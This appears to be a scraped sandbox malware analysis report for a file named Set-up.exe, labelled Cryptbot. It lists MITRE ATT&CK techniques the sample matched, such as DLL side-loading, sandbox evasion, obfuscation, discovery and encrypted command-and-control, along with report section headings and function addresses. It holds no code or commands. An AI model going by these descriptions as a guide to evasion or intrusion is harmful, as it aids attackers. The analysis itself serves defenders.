Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
Set-up.exe

Function 001D29FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Function 001D255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Function 00568C8A Relevance: 45.6, APIs: 16, Strings: 10, Instructions: 134
filelibraryloaderCOMMON

Function 0029AA30 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 364
networkCOMMON

Function 001D116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 00558E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 006781F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Function 001E05B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Function 0029B180 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 320
COMMON

Function 00299740 Relevance: 35.7, APIs: 12, Strings: 8, Instructions: 736
registrystringCOMMON

Function 001D2F17 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 144
registryCOMMON

Function 003AE5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Function 00208B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Function 001D76A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Function 003547B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON